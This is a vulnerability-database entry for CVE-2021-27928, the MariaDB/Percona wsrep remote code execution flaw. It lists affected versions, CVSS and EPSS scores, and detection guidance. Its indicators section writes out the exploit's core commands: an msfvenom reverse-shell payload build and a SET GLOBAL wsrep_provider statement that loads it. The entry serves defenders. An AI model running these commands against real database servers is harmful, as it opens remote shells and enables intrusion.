cbcvebase.
CVE-2021-27928
published 2021-03-19


Priority: P265 · high · 7.2 (CVSS 3.1)
Vector: AV:N / AC:L / PR:H / UI:N / S:U / C:H / I:H / A:H
Exploit: public exploit available
EPSS: 38.18% (98.4th percentile)
A remote code execution issue was discovered in MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL. An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd. NOTE: this does not affect an Oracle product.

Affected (20 ranges)

Vendor        | Product                                                      | Version range                          | Fixed in
debian        | debian_linux                                                 |                                        |
debian        | mariadb-10.5                                                 | < mariadb-10.5 1:10.5.9-1 (bullseye)   | mariadb-10.5 1:10.5.9-1 (bullseye)
galeracluster | wsrep                                                        | <= 2021-03-03                          |
mariadb       | mariadb                                                      | >= 10.2, < 10.2.37                     | 10.2.37
mariadb       | mariadb                                                      | >= 10.3, < 10.3.28                     | 10.3.28
mariadb       | mariadb                                                      | >= 10.4, < 10.4.18                     | 10.4.18
mariadb       | mariadb                                                      | >= 10.5, < 10.5.9                      | 10.5.9
msrc          | mariadb-10.3.28-1.cm1.aarch64.rpm_on_cbl_mariner_1.0_arm     |                                        |
msrc          | mariadb-10.3.28-1.cm1.x86_64.rpm_on_cbl_mariner_1.0_x64      |                                        |
msrc          | mariadb-debuginfo-10.3.28-1.cm1.aarch64.rpm_on_cbl_mariner_1.0_arm |                                  |
msrc          | mariadb-debuginfo-10.3.28-1.cm1.x86_64.rpm_on_cbl_mariner_1.0_x64  |                                  |
msrc          | mariadb-devel-10.3.28-1.cm1.aarch64.rpm_on_cbl_mariner_1.0_arm     |                                  |
msrc          | mariadb-devel-10.3.28-1.cm1.x86_64.rpm_on_cbl_mariner_1.0_x64      |                                  |
msrc          | mariadb-errmsg-10.3.28-1.cm1.aarch64.rpm_on_cbl_mariner_1.0_arm    |                                  |
msrc          | mariadb-errmsg-10.3.28-1.cm1.x86_64.rpm_on_cbl_mariner_1.0_x64     |                                  |
msrc          | mariadb-server-10.3.28-1.cm1.aarch64.rpm_on_cbl_mariner_1.0_arm    |                                  |
msrc          | mariadb-server-10.3.28-1.cm1.x86_64.rpm_on_cbl_mariner_1.0_x64     |                                  |
msrc          | mariadb-server-galera-10.3.28-1.cm1.aarch64.rpm_on_cbl_mariner_1.0_arm |                              |
msrc          | mariadb-server-galera-10.3.28-1.cm1.x86_64.rpm_on_cbl_mariner_1.0_x64  |                              |
percona       | percona_server                                               | <= 2021-03-03                          |

Detection & IOCs (extracted from sources)

filename: CVE-2021-27928.so
path:     /tmp/CVE-2021-27928.so
command:  SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";
command:  msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf-so -o CVE-2021-27928.so
  • Monitor MariaDB/MySQL for SET GLOBAL wsrep_provider being set to a filesystem path (especially under /tmp/) that points to a .so shared library; this is the core exploit primitive for CVE-2021-27928.
  • Alert on the MariaDB/MySQL process spawning unexpected child processes or opening outbound network connections: exploitation loads a malicious ELF shared object via wsrep_provider, giving code execution in the database server's process context.
  • Detect ELF shared objects (format elf-so) dropped into world-writable directories such as /tmp and subsequently loaded by the MariaDB/MySQL process.
  • Audit use of the SUPER privilege in MariaDB/MySQL; exploitation requires a SUPER-privileged account to modify the wsrep_provider and wsrep_notify_cmd global variables.
  • The exploit requires the attacker to hold a database account with the SUPER privilege; without SUPER, the SET GLOBAL wsrep_provider statement cannot be executed.
  • wsrep_provider and wsrep_notify_cmd are the two modifiable system variables that open the exploit path; environments where Galera/wsrep is not configured may still be vulnerable if these variables remain writable.

CVSS provenance

Source        | Version | Score        | Vector
nvd           | v3.1    | 7.2 HIGH     | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvd           | v2.0    | 9.0 CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C
osv           |         | 7.2 HIGH     |
vendor_debian |         | 7.2 HIGH     |
vendor_msrc   |         | 7.2 HIGH     |
vendor_redhat |         | 7.2 HIGH     |